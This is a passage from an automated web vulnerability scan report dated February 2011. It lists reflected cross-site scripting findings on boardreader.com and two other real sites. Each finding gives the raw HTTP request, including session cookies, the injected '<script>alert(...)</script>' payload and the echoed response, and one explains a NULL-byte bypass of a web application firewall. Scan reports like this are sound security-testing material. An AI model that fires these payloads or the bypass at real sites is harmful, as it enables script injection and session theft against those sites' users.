Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/s0.2mdn.net/viewad/817-grey.gife6bb6"><script>alert(1)</script>60f59291b18?p=10&format=RSS2.0" /> ...[SNIP]...
The value of the q2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002cc1b"><script>alert(1)</script>44dd33ad4cf was submitted in the q2 parameter. This input was echoed as 2cc1b"><script>alert(1)</script>44dd33ad4cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d233"><script>alert(1)</script>fb62f634db2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /linkinfo/2mdn.net9d233"><script>alert(1)</script>fb62f634db2 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2mdn.n ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/2mdn.net9d233"><script>alert(1)</script>fb62f634db2?p=10&format=RSS2.0" /> ...[SNIP]...
1.110. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /my/signup.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee33"><script>alert(1)</script>4385cd9a478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <form name="mylogin_" action="/my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1" method="POST"> ...[SNIP]...
1.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /s/2mdn.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe6"><script>alert(1)</script>3c9811f6ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1&p=20&format=RSS2.0" /> ...[SNIP]...
1.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Monterey_military_Group_CafeMo_764716.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992f8"><script>alert(1)</script>4308af3ecf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1" title="Monterey military Group - CafeMom | Site Profile"> ...[SNIP]...
1.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Nolan_Fans_Forums_8842059.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42801"><script>alert(1)</script>8c06b2169ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1" title="Nolan Fans | Forums | Site Profile"> ...[SNIP]...
1.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/RateDesi_Forums_13026.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e88"><script>alert(1)</script>ff22a856e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1" title="RateDesi Forums | Site Profile"> ...[SNIP]...
1.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Research_Learn_Message_Boards_1404604.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7999"><script>alert(1)</script>ffa4f5f1626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:54 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:13:55 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1" title="Research & Learn Message Boards - AOL Message Boards | Site Profile"> ...[SNIP]...
1.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Sherdog_Mixed_Martial_Arts_For_14952.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced5c"><script>alert(1)</script>6a0288545dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:20:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1" title="Sherdog Mixed Martial Arts Forums | Site Profile"> ...[SNIP]...
1.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/The_CafeMom_Newcomers_Club_Gro_655408.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6f5"><script>alert(1)</script>40022661852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1" title="The CafeMom Newcomers Club Group - CafeMom | Site Profile"> ...[SNIP]...
1.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/The_Mastiff_Sweet_Spot_6024491.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e18"><script>alert(1)</script>6e380957a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1" title="The Mastiff Sweet Spot | Site Profile"> ...[SNIP]...
1.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/UFC_Community_Forum_9057873.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb29"><script>alert(1)</script>110fab5c39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1" title="UFC Community Forum | Site Profile"> ...[SNIP]...
1.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Ultimate_College_Softball_5898982.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b11b"><script>alert(1)</script>5da4301906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:10:49 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:10:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1" title="Ultimate College Softball | Site Profile"> ...[SNIP]...
1.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/mntdiat_mai_aigi_7486781.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1ca"><script>alert(1)</script>c60cedb11b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1" title=".............. ...... ........ | Site Profile"> ...[SNIP]...
1.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://consumershealthyliving.com
Path: /clinical-study.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15882"><a>3a9ae0f5291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /clinical-study.html?15882"><a>3a9ae0f5291=1 HTTP/1.1
Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=n0799snp41r1h1s86rdk7kmg30; path=/
Last-Modified: Tue, 01 Feb 2011 15:31:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <a href="http://consumershealthyliving.com/clinical-study.html?15882"><a>3a9ae0f5291=1&fontstyle=f-larger" title="Increase Font Size" class="large"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0082f2d<a>e2e94140c60 was submitted in the REST URL parameter 1. This input was echoed as 82f2d<a>e2e94140c60 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%0082f2d<a>e2e94140c60/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:00 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8
